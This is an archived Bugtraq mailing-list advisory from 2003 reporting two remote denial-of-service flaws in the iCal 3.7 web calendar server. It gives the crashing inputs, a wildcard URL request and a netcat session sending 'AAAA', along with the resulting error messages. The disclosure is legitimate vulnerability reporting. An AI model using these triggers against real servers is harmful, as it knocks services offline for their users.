[28355] in bugtraq
ical 3.7 remote dos
daemon@ATHENA.MIT.EDU (securma massine)
Fri Jan 3 08:59:18 2003
From: securma massine <securma@caramail.com>
To: bugtraq@securityfocus.com
Message-ID: <1041592247021940@caramail.com>
Mime-Version: 1.0
Date: Fri, 03 Jan 2003 12:10:47 GMT+1
Content-Type: multipart/mixed; boundary="=_NextPart_Caramail_0219401041592247_ID"
--=_NextPart_Caramail_0219401041592247_ID
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
hi
iCal (http://www.brownbearsw.com)is a web-based calendar
that can be used to show meetings,
events, or other schedules. calendars can be viewed,
edited,
and administered totally through the web. iCal is build
for
thin-clients, so access calendar without any plug-ins
or java interpreters.
I found two vulnerabilities has ical 3.7
1-http//target/*
error message:Unable to write to D:\program files\iCl 3.7
Web Calender\*.cal (the server is down)
2-nc target 80
AAAA
[ enter ]
error message:Access violation at address 00403d8b in
module'ICAL.EXE' Read of address 0161c1af
ical is alerted the 26/12/2002
securma massine
_________________________________________________________
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors co=FBt du SMS)
--=_NextPart_Caramail_0219401041592247_ID--
